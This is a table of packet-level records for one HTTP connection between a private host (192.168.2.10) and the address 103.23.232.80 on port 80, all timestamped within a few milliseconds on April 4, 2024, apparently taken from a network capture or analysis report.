Apr 4, 2024 17:49:06.835304976 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835325003 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835341930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835345984 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835360050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835378885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835397959 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835417986 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835433006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835484982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835501909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835521936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835556030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835587978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835606098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835625887 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835640907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835648060 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835658073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835675955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835695028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835712910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835715055 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835738897 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835750103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835824013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835859060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835860968 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835896015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835897923 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835917950 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835932970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835948944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835967064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835988045 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836009979 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836025953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836041927 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836060047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836075068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836078882 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836117983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836124897 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836134911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836174965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836195946 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836245060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836262941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836281061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836287022 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836296082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836307049 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836314917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836334944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836349964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836373091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836412907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836437941 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836451054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836461067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836477041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836492062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836494923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836515903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836527109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836559057 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836565971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836582899 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836613894 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836620092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836637020 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836653948 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836672068 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836673975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836702108 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836739063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836756945 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836775064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836810112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836812973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836848974 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836869001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836886883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836889029 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836908102 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.836915970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836965084 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836991072 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.836997986 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837023973 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837109089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837147951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837162971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837199926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837248087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837265968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837280035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837284088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837304115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837321997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837336063 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837340117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837359905 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837377071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837395906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837414980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837431908 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837445021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837451935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837461948 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837495089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837500095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837516069 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837548971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837583065 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837587118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837605000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837622881 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837636948 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837656021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837662935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837694883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837729931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837764025 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837769985 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837794065 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837817907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837835073 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837852955 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837872982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837908030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837924004 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837949038 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.837954044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837973118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.837990999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838011026 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.838030100 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.838062048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838099957 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838114023 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838133097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838154078 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.838171005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838174105 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.838222980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838293076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838301897 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.838308096 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838332891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838351965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838367939 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.838368893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838404894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838423014 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838423967 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.838457108 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.838474989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838491917 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838516951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838526964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.838537931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838555098 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838570118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.838587999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.838587999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838655949 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838697910 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838731050 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.838740110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838787079 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838802099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838816881 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.838834047 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.838845015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838881969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838901043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.838937998 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839066982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839107990 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839128017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839143038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839179039 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839189053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839265108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839281082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839307070 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839308023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839323044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839342117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839350939 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839378119 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839412928 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839417934 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839432001 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839445114 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839503050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839519024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839554071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839581966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839620113 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839634895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839648008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839665890 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839687109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839701891 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839704037 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839724064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839740992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839776039 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839793921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839812040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839821100 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839831114 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839848042 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839852095 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839870930 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839884043 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839889050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839905977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.839920998 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.839972019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840008974 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840059042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840112925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840131044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840147018 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840150118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840168953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840193987 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840212107 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840231895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840231895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840245962 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840296984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840341091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840353012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840368032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840420961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840424061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840436935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840461969 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840490103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840507030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840526104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840552092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840555906 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840580940 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840607882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840625048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840646982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840660095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840682030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840687990 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840717077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840737104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840763092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840775013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840840101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840857983 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840858936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840878010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840893030 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840895891 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840913057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840925932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840931892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840950012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.840966940 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.840967894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841008902 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841022015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841037989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841047049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841058016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841094971 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841100931 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841124058 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841140032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841171026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841177940 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841208935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841228008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841247082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841274023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841279984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841298103 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841326952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841346979 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841362953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841367006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841386080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841417074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841427088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841442108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841461897 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841474056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841505051 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841510057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841562033 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841582060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841598988 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841599941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841619015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841638088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841651917 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841671944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841679096 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841691971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841723919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841747046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841763973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841795921 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841833115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841877937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841916084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.841927052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841943026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841960907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.841976881 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.842009068 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842024088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842041969 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842044115 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.842061043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842086077 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.842101097 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842133045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842137098 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.842152119 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842205048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842222929 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.842231989 CEST	49730	80	192.168.2.10	103.23.232.80
